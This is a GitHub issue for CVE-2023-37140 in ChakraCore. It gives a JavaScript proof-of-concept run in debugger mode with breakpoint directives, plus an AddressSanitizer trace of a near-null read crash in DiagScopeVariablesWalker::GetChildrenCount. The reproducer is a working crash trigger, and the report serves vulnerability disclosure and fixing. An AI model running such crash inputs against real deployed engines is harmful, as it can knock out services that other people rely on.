
CVE-2023-37140: SEGV (/root/ChakraCore-latest/out/Release/ch+0x8bcaaf) in Js::DiagScopeVariablesWalker::GetChildrenCount() · Issue #6885 · chakra-core/ChakraCore

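ChakraCore, at master branch commit cbb9b, was found to contain a segmentation violation (SEGV) in the function Js::DiagScopeVariablesWalker::GetChildrenCount(). In the AddressSanitizer report below, the fault is a READ at address 0x10 (zero page), i.e. a near-null pointer dereference. It is reached through the debugger's locals-inspection path (JsDiagGetStackProperties) while a debug event is being handled.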


Branch: master
Commit: cbb9b101d18e4c1682ca39a52a201d8e4241ea17

POC:

// Reproducer from the issue report: a debugger-mode script for the ChakraCore `ch` host.
// The /**bp:...**/ comments appear to be directives for the host's debugger harness
// (locals(), stack(), resume('step_*'), removeExpr()) rather than ordinary comments,
// so treat them as part of the test's behaviour and keep them byte-for-byte in place.
// In the ASan trace on this page the fault is a READ at 0x10 inside
// Js::DiagScopeVariablesWalker::GetChildrenCount(), reached from
// JsDiagGetStackProperties while a step event is dispatched under OP_TryCatch.
function Run() {
    // f1 and f2 are defined but never called anywhere in this listing.
    function f1() {
        var m = 31;
        m++;
        var coll = new Intl.Collator();
        m += f2();
        return m;
    }

    function f2() {
        return 100;
    }

    // test6: breakpoint directives around Intl.NumberFormat construction and a
    // try/catch whose catch block holds a block-scoped `let` plus a nested function.
    // NOTE(review): the OP_TryCatch frame in the trace suggests the crashing locals
    // walk happens while stepping through this function - confirm against a debug build.
    function test6() {
        var formatter = new Intl.NumberFormat("en-US");/**bp:locals();resume('step_over');locals();resume('step_into');locals();stack();resume('step_out');locals();stack();**/ 
        try {
        throw -1;
    }
    catch { // catch scope
        let b = 2;
        (function g() {
            var c = 3;
            // NOTE(review): `a` is not declared anywhere in this listing, so evaluating
            // it would throw a ReferenceError if this line runs - confirm this is intended.
            a; b; c; /**bp:locals(1)**/
        })();
    }
        formatter;
        formatter = new Intl.NumberFormat("en-US"); /**bp:locals();resume('step_into');locals();**/
    }
    test6();

    // test8/test7: steps out of an Array.prototype.every callback that receives
    // Date.prototype.toLocaleString, then inspects locals from the caller.
    function test8() {
        function test7() {
            var d = new Date(2013, 1, 1);     
            [d.toLocaleString].every(function (f) {
                f; /**bp:resume('step_out');locals();stack()**/
                return f;
            });
            return d;
        }
        test7();        /**bp:locals();resume('step_into');locals();removeExpr()**/
    }
    test8();


    // test9: locals inspection inside a nested function, then a step-over in the caller.
    function test9() {
        var k = 10;
        function test10 () {
            var k1 = 10; /**bp:locals()**/
            return k1;
        }
        k+= test10(); /**bp:resume('step_over');**/
    }
    test9();
    WScript.Echo("Pass");
}
// Host-provided entry point: the trace shows WScriptJsrt::AttachCallback invoking
// the passed function, with the Debugger::HandleDebugEvent frames above it.
WScript.Attach(Run);

Error info:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==10311==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55570e6a7ab0 bp 0x7ffc8f8a7a70 sp 0x7ffc8f8a79a0 T0)
==10311==The signal is caused by a READ memory access.
==10311==Hint: address points to the zero page.
    #0 0x55570e6a7aaf in Js::DiagScopeVariablesWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8bcaaf)
    #1 0x55570e6adb4c in Js::LocalsWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8c2b4c)
    #2 0x55570e2e47ca in JsrtDebuggerStackFrame::GetLocalsObject(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4f97ca)
    #3 0x55570e3767f5 in JsDiagGetStackProperties (/root/ChakraCore-latest/out/Release/ch+0x58b7f5)
    #4 0x55570e1a596b in Debugger::GetStackProperties(void*, bool, void**, unsigned short, void*) (/root/ChakraCore-latest/out/Release/ch+0x3ba96b)
    #5 0x55570ed9bf61 in Js::JavascriptExternalFunction::StdCallExternalFunctionThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb0f61)
    #6 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #7 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #8 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #9 0x55570edade91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
    #10 0x55570eda04ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
    #11 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #12 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #13 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #14 0x55570eb47385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
    #15 0x55570eb46de1 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5bde1)
    #16 0x55570e8e92d9 in Js::InterpreterStackFrame::ProcessProfiled() (/root/ChakraCore-latest/out/Release/ch+0xafe2d9)
    #17 0x55570e83d1dd in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa521dd)
    #18 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #19 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #20 0x7f2e8c681f41  (<unknown module>)
    #21 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #22 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #23 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #24 0x55570eb449c5 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd599c5)
    #25 0x55570eb44421 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59421)
    #26 0x55570e8e9dd8 in Js::InterpreterStackFrame::ProcessProfiled() (/root/ChakraCore-latest/out/Release/ch+0xafedd8)
    #27 0x55570e83d1dd in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa521dd)
    #28 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #29 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #30 0x7f2e8c681eb9  (<unknown module>)
    #31 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #32 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #33 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #34 0x55570edade91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
    #35 0x55570eda04ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
    #36 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #37 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #38 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #39 0x55570eb47385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
    #40 0x55570e877d79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
    #41 0x55570e83d24a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
    #42 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #43 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #44 0x7f2e8c681ef1  (<unknown module>)
    #45 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #46 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #47 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #48 0x55570eb44b55 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59b55)
    #49 0x55570e878893 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8d893)
    #50 0x55570e83d24a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
    #51 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #52 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #53 0x7f2e8c681f01  (<unknown module>)
    #54 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #55 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #56 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #57 0x55570edade91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
    #58 0x55570eda04ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
    #59 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #60 0x55570e50a446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
    #61 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #62 0x55570eb47385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
    #63 0x55570e877d79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
    #64 0x55570e83d24a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
    #65 0x55570e83b56f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
    #66 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #67 0x7f2e8c681f09  (<unknown module>)
    #68 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #69 0x55570e50c31a in Js::ScriptContext::ProfileModeThunk_DebugModeWrapper(Js::JavascriptFunction*, Js::ScriptContext*, void* (*)(Js::RecyclableObject*, Js::CallInfo, ...), Js::Arguments&) (/root/ChakraCore-latest/out/Release/ch+0x72131a)
    #70 0x55570e50a36d in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f36d)
    #71 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #72 0x55570eda1a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
    #73 0x55570eda172f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
    #74 0x55570e29a75a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
    #75 0x55570e1a7c15 in Debugger::CallFunction(char const*, void**, void*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3bcc15)
    #76 0x55570e1a4319 in Debugger::HandleDebugEvent(_JsDiagDebugEvent, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b9319)
    #77 0x55570e2d9d20 in JsrtDebugManager::CallDebugEventCallback(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0x4eed20)
    #78 0x55570e2daf0a in JsrtDebugManager::CallDebugEventCallbackForBreak(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4eff0a)
    #79 0x55570e2d87c3 in JsrtDebugManager::ReportBreak(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed7c3)
    #80 0x55570e2d82a5 in JsrtDebugManager::DispatchHalt(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed2a5)
    #81 0x55570e6e3dc9 in Js::ProbeContainer::DispatchStepHandler(Js::InterpreterHaltState*, Js::OpCode*) (/root/ChakraCore-latest/out/Release/ch+0x8f8dc9)
    #82 0x55570e8562a0 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6b2a0)
    #83 0x55570e83cb77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
    #84 0x55570e8f9670 in Js::InterpreterStackFrame::OP_TryCatch(Js::OpLayoutBr const __unaligned*) (/root/ChakraCore-latest/out/Release/ch+0xb0e670)
    #85 0x55570e862238 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa77238)
    #86 0x55570e83cb77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
    #87 0x55570e83b981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
    #88 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #89 0x7f2e8c680f91  (<unknown module>)
    #90 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #91 0x55570e50a65a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
    #92 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #93 0x55570eb44b55 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59b55)
    #94 0x55570eb44421 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59421)
    #95 0x55570e85a174 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6f174)
    #96 0x55570e83cb77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
    #97 0x55570e83b981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
    #98 0x55570e83a8ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
    #99 0x7f2e8c680f99  (<unknown module>)
    #100 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #101 0x55570e50a65a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
    #102 0x55570f125ffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
    #103 0x55570eda1a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
    #104 0x55570eda172f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
    #105 0x55570e29a75a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
    #106 0x55570e1c2b1a in WScriptJsrt::CallbackMessage::CallFunction(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3d7b1a)
    #107 0x55570e1c5e0b in CustomMessage<WScriptJsrt::AttachCallback(void*, bool, void**, unsigned short, void*)::$_1, WScriptJsrt::CallbackMessage>::Call(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3dae0b)
    #108 0x55570e19f804 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b4804)
    #109 0x55570e1a2913 in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b7913)
    #110 0x55570e1a3606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
    #111 0x7f2e90b81c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    #112 0x55570e0a1d59 in _start (/root/ChakraCore-latest/out/Release/ch+0x2b6d59)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/root/ChakraCore-latest/out/Release/ch+0x8bcaaf) in Js::DiagScopeVariablesWalker::GetChildrenCount()
==10311==ABORTING
